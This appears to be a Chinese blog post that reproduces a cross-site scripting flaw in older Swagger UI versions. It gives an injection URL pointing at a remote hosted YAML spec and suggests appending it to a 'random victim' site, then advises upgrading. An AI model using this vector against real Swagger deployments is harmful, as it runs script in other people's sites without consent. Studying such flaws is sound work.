swagger xss漏洞复现

扣脚大汉在网络2024-04-27 9:39

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户

根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗

json网站:https://jumpy-floor.surge.sh/test.yaml

拼接方式

?url=https://your_api_spec/spec.yaml

?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问

进行拼接?url=https://jumpy-floor.surge.sh/test.yaml

弹窗

修复建议:

升级到最新

相关推荐
携欢1 天前
PortSwigger靶场之Stored DOM XSS通关秘籍
前端·xss
练习时长一年2 天前
后端接口防止XSS漏洞攻击
前端·xss
携欢3 天前
PortSwigger靶场之DOM XSS in jQuery selector sink using a hashchange event通关秘籍
前端·jquery·xss
在安全厂商修设备3 天前
XSS 跨站脚本攻击剖析与防御 - 第一章:XSS 初探
web安全·网络安全·xss
普通网友4 天前
前端安全攻防:XSS, CSRF 等防范与检测
前端·安全·xss
携欢4 天前
PortSwigger靶场之Reflected XSS into attribute with angle brackets HTML-encoded通关秘籍
前端·xss
W-GEO4 天前
前端安全攻防:XSS, CSRF 等常见威胁的防范与检测指南
前端·安全·xss
yenggd6 天前
3种XSS攻击简单案例
前端·xss
盖头盖6 天前
【xss基本介绍】
前端·xss
mooyuan天天8 天前
DVWA靶场通关笔记-存储型XSS(Stored Impossible级别)
xss·xss漏洞·存储型xss·dvwa靶场
热门推荐
01UV安装并设置国内源02GitHub 镜像站点03conda中设置镜像地址(附所有可换的地址)04KGG转MP3工具|非KGM文件|解密音频05A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程06UV 工具安装与国内镜像源配置指南07突破百度网盘的下载限速,两种方法教会你【超详细】0846个Nano-banana 精选提示词,持续更新中09智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践10Spec-Kit 使用指南